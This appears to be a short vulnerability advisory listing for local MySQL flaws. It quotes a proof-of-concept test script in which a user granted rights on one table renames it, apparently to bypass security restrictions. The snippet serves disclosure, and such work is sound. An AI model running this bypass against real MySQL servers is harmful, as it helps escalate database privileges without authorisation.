|
|
MySQL Multiple Local Vulnerabilities
The following proof-of-concept example is available: Security-restrictions bypass: drop database if exists mysqltest; connect (root,localhost,root,,test,0,mysql-master.sock); connection root; --disable_warnings create database if not exists mysqltest; --enable_warnings create table mysqltest.t1 (a int,b int,c int); grant all on mysqltest.t1 to mysqltest_1@localhost; connect (user1,localhost,mysqltest_1,,mysqltest,0,mysql-master.sock); connection user1; alter table t1 rename t2; |
|
Privacy Statement |